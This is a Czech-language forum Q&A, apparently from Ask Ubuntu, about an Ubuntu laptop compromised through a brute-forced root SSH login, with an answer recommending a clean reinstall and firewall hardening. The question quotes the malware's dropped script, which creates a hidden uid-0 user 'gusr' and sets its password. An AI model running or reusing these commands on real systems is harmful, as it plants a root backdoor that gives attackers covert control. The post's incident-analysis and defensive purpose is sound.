Jsem si docela jistý, že můj notebook Ubuntu 13.10 je infikován nějakým druhem malwaru.
Jednou za čas najdu proces /lib/sshd (vlastněný rootem), který běží a spotřebovává spoustu cpu. Není to sshd server, na kterém běží /usr/sbin/sshd.
Binární soubor má oprávnění –wxrw-rwt a generuje a vytváří skripty v adresáři /lib. Nejnovější se jmenuje 13959730401387633604 a dělá následující
#!/bin/sh
exec 1>/dev/null
exec 2>/dev/null
useradd -g 0 -u 0 -o gusr
echo gusr:chaonimabi123456123 | chpasswd
Uživatel gusr byl vytvořen malwarem nezávisle a poté se chpasswd zablokuje, zatímco spotřebovává 100 % CPU.
Doposud jsem zjistil, že uživatel gusr byl dodatečně přidán do souborů v /etc/
/etc/group
/etc/gshadow
/etc/passwd
/etc/shadow
/etc/subgid
/etc/subuid
Zdá se, že malware vytvořil kopie všech těchto souborů s příponou „-“. Úplný seznam souborů /etc/, které byly změněny uživatelem root, je k dispozici zde.
Kromě toho byl soubor /etc/hosts změněn na tento.
/lib/sshd začíná přidáním sebe sama na konec souboru /etc/init.d/rc.local!
Odebral jsem uživatele, odstranil jsem soubory, zabil strom zpracování, změnil jsem hesla a odstranil jsem veřejné klíče ssh.
Jsem si vědom toho, že jsem v podstatě podělaný a nejspíš budu celý systém přeinstalovat. Nicméně, protože se přihlašuji na několik dalších strojů, bylo by dobré se alespoň pokusit to odstranit a zjistit, jak jsem to získal. Jakékoli návrhy, jak v této věci postupovat, oceníme.
Zdá se, že se dostali 25. března hrubým vynuceným přihlášením roota. Netušil jsem, že root ssh je v Ubuntu standardně povolen. Zakázal jsem to a nastavil denyhosts.
Přihlášení bylo z 59.188.247.236, zřejmě někde v Hong Kongu.
Dostal jsem notebook od EmperorLinux a povolili přístup root. Pokud jeden z nich máte a používáte sshd, dejte si pozor.
Přijatá odpověď:
Nejprve tento stroj okamžitě odpojte od sítě!
Za druhé, proč máte povolený účet root? Opravdu byste neměli povolit účet root, pokud k tomu nemáte velmi dobrý důvod.
Zatřetí, ano, jediný způsob, jak se ujistit, že jste čistí, je provést čistou instalaci. Také se doporučuje, abyste začali znovu a nevraceli se k záloze, protože si nikdy nemůžete být jisti, kdy to všechno začalo.
Související:Příkaz pro určení veřejné IP?Doporučuji také, abyste při příští instalaci nastavili firewall a zakázali všechna příchozí připojení:
sudo ufw default deny incoming
a poté povolte ssh pomocí:
sudo ufw allow ssh
a NEPOVOLUJTE účet root! Určitě ujistěte se, že přihlášení root ssh je zakázáno.